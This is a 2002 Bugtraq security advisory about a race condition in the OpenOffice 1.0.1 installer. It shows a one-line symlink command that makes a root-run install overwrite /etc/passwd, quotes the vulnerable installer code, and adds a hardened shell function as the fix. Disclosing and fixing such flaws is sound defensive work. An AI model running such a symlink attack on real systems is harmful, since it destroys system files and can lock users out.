Bugtraq mailing list archives
OpenOffice 1.0.1 Race condition during installation.
From: "Larry W. Cashdollar" <lwc () vapid ath cx>
Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
Vapid Labs
Larry W. Cashdollar
9/9/02

Summary:
OpenOffice 1.0.1 Race condition during installation can overwrite system files.

Severity: Low

Description:
A very simple and easy to exploit race condition exists during the installation of OpenOffice. During this window a malicious user could create a symlink in /tmp and overwrite arbitrary files.

Exploit:
As a normal user:

    lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

Where $USERNAME is the installer account name, probably root.

will result in the password file being overwritten with:

    # create the proper autoresponse file
    cat << EOF > /tmp/${USER}_autoresponse.conf
    [ENVIRONMENT]
    INSTALLATIONMODE=$installtype
    INSTALLATIONTYPE=STANDARD
    DESTINATIONPATH=$prefix/$oo_home
    OUTERPATH=
    LOGFILE=
    LANGUAGELIST=<LANGUAGE>

    [JAVA]
    JavaSupport=preinstalled_or_none
    EOF

Fix:
Create a directory under /tmp to work from, with restrictive permissions.

References:
http://www.openoffice.org/dev_docs/source/1.0.1/index.html

Larry W. Cashdollar
lwc () vapid ath cx
http://vapid.ath.cx
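
The fix suggested in the advisory, sketched as an added example (not part of the original post and not the OpenOffice installer's own code): the response file is written inside a private, unpredictably named directory instead of at a guessable path in /tmp. The function name write_autoresponse and the oo_install prefix are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: hardened replacement for the predictable
# /tmp/${USER}_autoresponse.conf write. Names are hypothetical; the file
# contents mirror the installer snippet quoted in the advisory.

# Writes the response file into a private 0700 work directory and prints
# its path on stdout. Returns non-zero if anything fails.
write_autoresponse() {
    installtype=$1
    prefix=$2
    oo_home=$3

    # Restrictive umask first, so nothing is created group/world accessible.
    old_umask=$(umask)
    umask 077

    # mktemp -d picks an unpredictable name and fails if the name exists,
    # so a pre-planted symlink or directory cannot be reused.
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/oo_install.XXXXXXXXXX") || {
        umask "$old_umask"; return 1
    }
    conf="$workdir/autoresponse.conf"

    # With noclobber (set -C) the redirect fails if $conf already exists,
    # rather than overwriting whatever is there.
    (
        set -C
        cat > "$conf" <<EOF
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none
EOF
    ) || { umask "$old_umask"; rm -rf "$workdir"; return 1; }

    umask "$old_umask"
    printf '%s\n' "$conf"
}
```

The caller passes the printed path to the next installer step and removes the work directory when done.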